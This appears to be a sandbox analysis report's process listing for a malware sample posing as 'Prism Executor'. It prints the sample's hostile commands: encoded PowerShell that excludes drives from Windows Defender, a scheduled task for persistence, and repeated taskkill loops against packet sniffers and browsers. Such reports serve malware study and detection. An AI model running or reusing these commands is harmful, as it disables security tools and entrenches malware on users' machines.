PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2312 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2312 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 3596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="

C:\Users\Admin\dllhost.exe

"C:\Users\Admin\dllhost.exe"

C:\Users\Admin\Prism Executor.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa7e72ab58,0x7ffa7e72ab68,0x7ffa7e72ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1748 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2236 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4348 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3928 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4668 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4832 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4996 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4320 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5028 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 --field-trial-handle=1928,i,16696839194252658229,7204569403200581612,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\srcoob.exe

"C:\Users\Admin\AppData\Local\Temp\srcoob.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\srcoob.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe" "--multiprocessing-fork" "parent_pid=4892" "pipe_handle=280"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath \"C:\\\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\cmd.exe

